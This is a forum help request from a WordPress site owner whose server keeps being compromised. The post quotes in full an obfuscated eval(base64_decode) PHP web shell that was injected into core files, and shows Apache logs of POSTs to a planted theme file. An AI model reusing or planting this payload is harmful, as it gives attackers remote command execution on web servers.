Question
DigitalOcean Wordpress instance getting attacked
Hey,
I’ve got a wordpress instance setup from the one-click digital ocean installer. It runs fine most of the time but I keep getting attacked, causing the site to go down.
I have already setup JetPack as described in this article to prevent rpc attacks, but I still seem to be getting screwed.
This keeps getting injected into my php files (wp-config.php, index.php, wp-settings.php, etc)
eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9JRDBnSW1ZeU1HUTJOVFEyTTJZeFpqVmlaalJrTldRNE56VXlPR0UxWlRJd01EUm1JanNLSkhWeWJDQTlJQ0pvZEhSd09pOHZJaTRrWDFORlVsWkZVbHNuU0ZSVVVGOUlUMU5VSjEwdUpGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTA3Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJGMWRBPT0iOyRhcnJbMV09ImFGOW1iM0p0S0NrZ2V3b2dJQ0FnWjJ4dlltRnNJQ1IxY213N0NpQWdJQ0EvUGdvZ0lDQWdQR1p2Y20wZ1lXTjBhVzl1UFNJOFAzQm9jQ0JsWTJodklDUjFjbXdnUHo0aUlHMWxkR2h2WkQwaWNHOXpkQ0krQ2lBZ0lDQWdJQ0FnUEdsdWNIVjBJSFI1Y0dVOUluQmhjM04zYjNKa0lpQnBaRDBpY0hka0lpQnVZUT09IjskYXJyWzJdPSJiV1U5SW5CM1pDSStDaUFnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SW1ocFpHUmxiaUlnYVdROUltUnZYMkYxZEdnaUlHNWhiV1U5SW1SdlgyRjFkR2dpUGdvZ0lDQWdJQ0FnSUR4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaVBnb2dJQ0FnUEM5bWIzSnRQZ284UDNCb2NBcDlDZ3BtZFc1amRHbHZiaUJoZFE9PSI7JGFyclszXT0iZEdnb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkdGMWRHZzdDaUFnSUNCcFppQW9LQ0ZwYzNObGRDZ2tYME5QVDB0SlJWc25ZWFYwYUNkZEtTa2dKaVlnS0NGcGMzTmxkQ2drWDFCUFUxUmJKMlJ2WDJGMWRHZ25YU2twS1NCN0NpQWdJQ0FnSUNBZ1pHbHpjR3hoZVY5aGRYUm9YMlp2Y20wb0tUc0tJQ0FnSUNBZ0lBPT0iOyRhcnJbNF09IklHUnBaU2dwT3dvZ0lDQWdmUW9nSUNBZ2FXWWdLR2x6YzJWMEtDUmZVRTlUVkZzblpHOWZZWFYwYUNkZEtTa2dld29nSUNBZ0lDQWdJR2xtSUNocGMzTmxkQ2drWDFCUFUxUmJKM0IzWkNkZEtTa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9iV1ExS0NSZlVFOVRWRnNuY0hka0oxMHBQVDA5SkdGMWRHZ3BJQT09IjskYXJyWzVdPSJld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjMlYwWTI5dmEybGxLQ0poZFhSb0lpeHRaRFVvSkY5UVQxTlVXeWR3ZDJRblhTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlIUnlkV1U3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMGdaV3h6WlNCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FYTndiR0Y1WHc9PSI7JGFycls2XT0iWVhWMGFGOW1iM0p0S0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FXVW9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdaR2x6Y0d4aGVWOWhkWFJvWDJadmNtMG9LVHNLSUNBZ0lDQWdJQ0JrYVdVb0tUc0tJQ0FnSUgwS0NpQWdJQ0JwWmlBb2FYTnpaWFFvSkY5RFR3PT0iOyRhcnJbN109IlQwdEpSVnNuWVhWMGFDZGRLU2tLSUNBZ0lDQWdJQ0JwWmlBb0pGOURUMDlMU1VWYkoyRjFkR2duWFQwOVBTUmhkWFJvS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJSEpsZEhWeWJpQjBjblZsT3dvZ0lDQWdJQ0FnSUgwZ1pXeHpaU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHUnBjM0JzWVhsZllYVjBhRjltYjNKdEtDazdDZz09IjskYXJyWzhdPSJJQ0FnSUNBZ0lDQWdJQ0FnWkdsbEtDazdDaUFnSUNBZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJsdWRHVnlabUZqWlNncElIc0tJQ0FnSUdkc2IySmhiQ0FrZFhKc093b2dJQ0FnUHo0S0lDQWdJRHhvZEcxc1Bnb2dJQ0FnUEhScGRHeGxQancvY0dod0lHVmphRzhnSkY5VFJWSldSVkpiSnc9PSI7JGFycls5XT0iU0ZSVVVGOUlUMU5VSjEwN0lEOCtQQzkwYVhSc1pUNEtJQ0FnSUR4emRIbHNaVDRLSUNBZ0lDQWdJQ0FqZDJsdVpHOTNjaUI3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWnZiblF0YzJsNlpUb2dNVE53ZURzS0lDQWdJQ0FnSUNBZ0lDQWdZMjlzYjNJNkl6QXdabVl3TURzS0lDQWdJQ0FnSUNBZ0lDQWdZbTl5WkdWeU9nPT0iOyRhcnJbMTBdPSJNbkI0SUhOdmJHbGtJQ013TUdFd01EQTdDaUFnSUNBZ0lDQWdJQ0FnSUhkcFpIUm9Pamd3TUhCNE95Qm9aV2xuYUhRNk5UQndlRHNLSUNBZ0lDQWdJQ0FnSUNBZ1ltRmphMmR5YjNWdVpEb2dJekF3TURBd01Ec0tJQ0FnSUNBZ0lDQWdJQ0FnY0dGa1pHbHVaeTFzWldaME9qRXdjSGc3Q2lBZ0lDQWdJQ0FnZlE9PSI7JGFyclsxMV09IkNpQWdJQ0FnSUNBZ0kyTnRaQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHSmhZMnRuY205MWJtUTZJQ015UmpKR01rWTdDaUFnSUNBZ0lDQWdJQ0FnSUdOdmJHOXlPaU13TUdabU1EQTdDaUFnSUNBZ0lDQWdmUW9nSUNBZ1BDOXpkSGxzWlQ0S0lDQWdJRHh6WTNKcGNIUStDZ29nSUNBZ0lDQWdJR1oxYm1OMGFXOXVJQT09IjskYXJyWzEyXT0iYkc5bmIzVjBLQ2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmtiMk4xYldWdWRDNWpiMjlyYVdVOUltRjFkR2c5TVRzaU93b2dJQ0FnSUNBZ0lDQWdJQ0IzYVc1a2IzY3ViRzlqWVhScGIyNDlKencvY0dod0lHVmphRzhnSkhWeWJEc2dQejRuT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1puVnVZM1JwYjI0Z1lRPT0iOyRhcnJbMTNdPSJhbUY0UTJGc2JHSmhZMnNvZEhoMEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUhaaGNpQjNhVzVrYjNkeUlEMGdaRzlqZFcxbGJuUXVaMlYwUld4bGJXVnVkRUo1U1dRb0ozZHBibVJ2ZDNJbktUc0tJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNjaTUyWVd4MVpUMTNhVzVrYjNkeUxuWmhiSFZsSzNSNGRDc25YRzRuT3c9PSI7JGFyclsxNF09IkNpQWdJQ0FnSUNBZ0lDQWdJSGRwYm1SdmQzSXVjMk55YjJ4c1ZHOXdJRDBnZDJsdVpHOTNjaTV6WTNKdmJHeElaV2xuYUhRN0NpQWdJQ0FnSUNBZ0lDQWdJSFpoY2lCamJXUWdQU0JrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwUW5sSlpDZ25ZMjFrSnlrN0NpQWdJQ0FnSUNBZ0lDQWdJR050WkM1MllXeDFaUT09IjskYXJyWzE1XT0iUFNjbk93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdablZ1WTNScGIyNGdZMkZzYkVGcVlYZ29kWEpzTEhCdmMzUmtZWFJoS1hzS0lDQWdJQ0FnSUNBZ0lDQWdMeTkyWVhJZ1ltOWtlU0E5SUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENod2IzTjBaR0YwWVNrN0NpQWdJQ0FnSUNBZ0lDQWdJQzh2WVd4bGNnPT0iOyRhcnJbMTZdPSJkQ2h3YjNOMFpHRjBZU2s3SUhKbGRIVnlianNLSUNBZ0lDQWdJQ0FnSUNBZ2RtRnlJSGh0YkdoMGRIQTdDZ29nSUNBZ0lDQWdJQ0FnSUNCNGJXeG9kSFJ3SUQwZ2JtVjNJRmhOVEVoMGRIQlNaWEYxWlhOMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjI1eVpXRmtlWE4wWVhSbFkyaGhibWRsSUE9PSI7JGFyclsxN109IlBTQm1kVzVqZEdsdmJpZ3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0hodGJHaDBkSEF1Y21WaFpIbFRkR0YwWlNBOVBTQTBJQ1ltSUhodGJHaDBkSEF1YzNSaGRIVnpJRDA5SURJd01DbDdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVdwaGVFTmhiR3hpWVdOcktIaHRiR2gwZEhBdWNtVnpjQT09IjskYXJyWzE4XT0iYjI1elpWUmxlSFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjNCbGJpZ2lVRTlUVkNJc0lIVnliQ3dnZEhKMVpTazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YzJWMFVtVnhkV1Z6ZEVobFlXUmxjaWduUTI5dWRBPT0iOyRhcnJbMTldPSJaVzUwTFZSNWNHVW5MQ0FuWVhCd2JHbGpZWFJwYjI0dmVDMTNkM2N0Wm05eWJTMTFjbXhsYm1OdlpHVmtKeWs3Q2lBZ0lDQWdJQ0FnSUNBZ0lIaHRiR2gwZEhBdWMyVnVaQ2h3YjNOMFpHRjBZU2s3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCbWRXNWpkR2x2YmlCb1lXNWtiR1ZGYm5SbGNpaHZMR1VwSUE9PSI7JGFyclsyMF09ImV3b2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1pTNXJaWGxEYjJSbElEMDlJREV6S1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCMllYSWdZMjFrSUQwZ1pHOWpkVzFsYm5RdVoyVjBSV3hsYldWdWRFSjVTV1FvSjJOdFpDY3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdkbUZ5SUhkcGJtUnZkM0lnUFNCa2IyTjFiUT09IjskYXJyWzIxXT0iWlc1MExtZGxkRVZzWlcxbGJuUkNlVWxrS0NkM2FXNWtiM2R5SnlrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCM2FXNWtiM2R5TG5aaGJIVmxQWGRwYm1SdmQzSXVkbUZzZFdVckoxeHVKQ0FuSzJOdFpDNTJZV3gxWlNzblhHNG5Pd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZMkZzYkVGcVlYZ29KencvY0dod0lBPT0iOyRhcnJbMjJdPSJaV05vYnlBa2RYSnNPeUEvUGljc0oyRmpkR2x2YmoxamJXUW1ZMjFrUFNjclpXNWpiMlJsVlZKSlEyOXRjRzl1Wlc1MEtHTnRaQzUyWVd4MVpTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlHWmhiSE5sT3dvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9LQ2lBZ0lDQThMM05qY2c9PSI7JGFyclsyM109ImFYQjBQZ29nSUNBZ1BHSnZaSGtnYzNSNWJHVTlJbUpoWTJ0bmNtOTFibVE2SUNNd01EQTdJajRLSUNBZ0lEeDBZV0pzWlNCM2FXUjBhRDBpTVRBd0pTSWdZbTl5WkdWeVBTSXdJaUJ6ZEhsc1pUMGlZbUZqYTJkeWIzVnVaRG9nSXpBd01Ec2dZMjlzYjNJNklDTXdaakE3SWo0S0lDQWdJQ0FnSUNBOGRISWdkdz09IjskYXJyWzI0XT0iYVdSMGFEMGlNVEF3SlNJK0NpQWdJQ0FnSUNBZ0lDQWdJRHgwWkNCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQThZMlZ1ZEdWeVBnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJwWkQwaVkyMWtJaUJ1WVcxbFBTSmpiV1FpSUhOMGVRPT0iOyRhcnJbMjVdPSJiR1U5SW5kcFpIUm9PaUE0TURCd2VEc2lJRzl1YTJWNVpHOTNiajBpYW1GMllYTmpjbWx3ZERwb1lXNWtiR1ZGYm5SbGNpaDBhR2x6TEdWMlpXNTBLVHNpUGdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnUEM5alpXNTBaWEkrQ2lBZ0lDQWdJQ0FnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQWdJQ0FnUEM5MGNqNEtJQ0FnSUE9PSI7JGFyclsyNl09IklDQWdJRHgwY2lCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUR4MFpDQjNhV1IwYUQwaU1UQXdKU0krQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0E4WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUR4MFpYaDBZWEpsWVNCcFpEMGlkMmx1Wkc5M2NpSWdibUZ0WlQwaWQybHVaQT09IjskYXJyWzI3XT0iYjNkeUlpQnpkSGxzWlQwaWQybGtkR2c2SURnd01IQjRPeUJvWldsbmFIUTZJRGd3TUhCNE95SStQQzkwWlhoMFlYSmxZVDRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHd2WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBOEwzUmtQZ29nSUNBZ0lDQWdJRHd2ZEhJK0NpQWdJQ0FnSUNBZ1BIUnlQangwWkQ0OFl3PT0iOyRhcnJbMjhdPSJaVzUwWlhJK1BHRWdhSEpsWmowaUl5SWdiMjVqYkdsamF6MGlhbUYyWVhOamNtbHdkRG9nYkc5bmIzVjBLQ2s3SWo1bGVHbDBQQzloUGp3dlkyVnVkR1Z5UGp3dmRHUStQQzkwY2o0S0lDQWdJRHd2ZEdGaWJHVStDaUFnSUNBOEwySnZaSGsrQ2lBZ0lDQThMMmgwYld3K0Nqdy9jR2h3Q24wS0NtWjFibU4wYVE9PSI7JGFyclsyOV09ImIyNGdhR0Z1Wkd4bFgyTnRaQ2dwSUhzS0lDQWdJSE41YzNSbGJTZ2tYMUJQVTFSYkoyTnRaQ2RkTGlJZ01qNG1NU0lwT3dwOUNncG1kVzVqZEdsdmJpQm9ZVzVrYkdWZlltOTBYMk50WkNncElIc0tJQ0FnSUdsbUlDaHBjM05sZENna1gxQlBVMVJiSjJOdFpDZGRLU2tLSUNBZ0lDQWdJQ0J6ZDJsMFkyZ29KQT09IjskYXJyWzMwXT0iWDFCUFUxUmJKMk50WkNkZEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUdOaGMyVWdKMk52WkdVbk9nb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmWTI5a1pTZ3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ0lDQWdJR05oYzJVZ0ozTm9aV3hzSnpvS0lBPT0iOyRhcnJbMzFdPSJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmYzJobGJHd29LVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR0p5WldGck93b2dJQ0FnSUNBZ0lDQWdJQ0JrWldaaGRXeDBPZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ2ZRcDlDZ3BtZFc1amRHbHZiaUJvWVE9PSI7JGFyclszMl09ImJtUnNaVjlpYjNSZlkyMWtYM05vWld4c0tDa2dld29nSUNBZ2IySmZjM1JoY25Rb0tUc0tJQ0FnSUhONWMzUmxiU2hpWVhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzbllYSm5KMTBwS1RzS0lDQWdJQ1J5UFc5aVgyZGxkRjlqYkdWaGJpZ3BPd29nSUNBZ2NISnBiblFnSkhJN0NuMEtDbVoxYm1OMGFXOXVJQT09IjskYXJyWzMzXT0iYUdGdVpHeGxYMkp2ZEY5amJXUmZZMjlrWlNncElIc0tJQ0FnSUc5aVgzTjBZWEowS0NrN0NpQWdJQ0JsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkY5UVQxTlVXeWRoY21jblhTa3BPd29nSUNBZ0pISTliMkpmWjJWMFgyTnNaV0Z1S0NrN0NpQWdJQ0J3Y21sdWRDQWtjanNLZlFvS1puVnVZM1JwYjI0Z2JBPT0iOyRhcnJbMzRdPSJiMmR2ZFhRb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkhWeWJEc0tJQ0FnSUhObGRHTnZiMnRwWlNnaVlYVjBhQ0lzSWpFaUtUc0tJQ0FnSUhCeWFXNTBJQ0k4YzJOeWFYQjBQbmRwYm1SdmR5NXNiMk5oZEdsdmJqMG5JaTRrZFhKc0xpSW5Pend2YzJOeWFYQjBQaUk3Q2lBZ0lDQmthV1VvS1RzS2ZRb0tDZ3BoZFE9PSI7JGFyclszNV09ImRHZ29LVHNLYVdZZ0tDRnBjM05sZENna1gxQlBVMVJiSjJGamRHbHZiaWRkS1NrS0lDQWdJR1JwYzNCc1lYbGZhVzUwWlhKbVlXTmxLQ2s3Q2dwcFppQW9hWE56WlhRb0pGOVFUMU5VV3lkaFkzUnBiMjRuWFNrcENpQWdJQ0J6ZDJsMFkyZ2dLQ1JmVUU5VFZGc25ZV04wYVc5dUoxMHBJSHNLSUNBZ0lDQWdJQT09IjskYXJyWzM2XT0iSUdOaGMyVWdKMk50WkNjNkNpQWdJQ0FnSUNBZ0lDQWdJR2hoYm1Sc1pWOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ1kyRnpaU0FuWW05MFkyMWtKem9LSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NnPT0iOyRhcnJbMzddPSJJQ0FnSUNBZ0lDQmpZWE5sSUNkc2IyZHZkWFFuT2dvZ0lDQWdJQ0FnSUNBZ0lDQnNiMmR2ZFhRb0tUc0tJQ0FnSUNBZ0lDQWdJQ0FnWW5KbFlXczdDaUFnSUNBZ0lDQWdaR1ZtWVhWc2REb0tJQ0FnSUNBZ0lDQWdJQ0FnY21WMGRYSnVPd29nSUNBZ2ZRPT0iOyRzdHI9IiI7Zm9yICgkaT0wOyAkaTxjb3VudCgkYXJyKTsgJGkrKykgeyRzdHIuPWJhc2U2NF9kZWNvZGUoJGFyclskaV0pO31ldmFsKCRzdHIpOw=="));
I believe RPC is working as when I check attacks they are all just JetPack. Ther results from (grep xmlrpc /var/log/apache2/access.log
) is:
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
There are some fishy lookin POSTs in my apache logs, but not sure if related:
162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
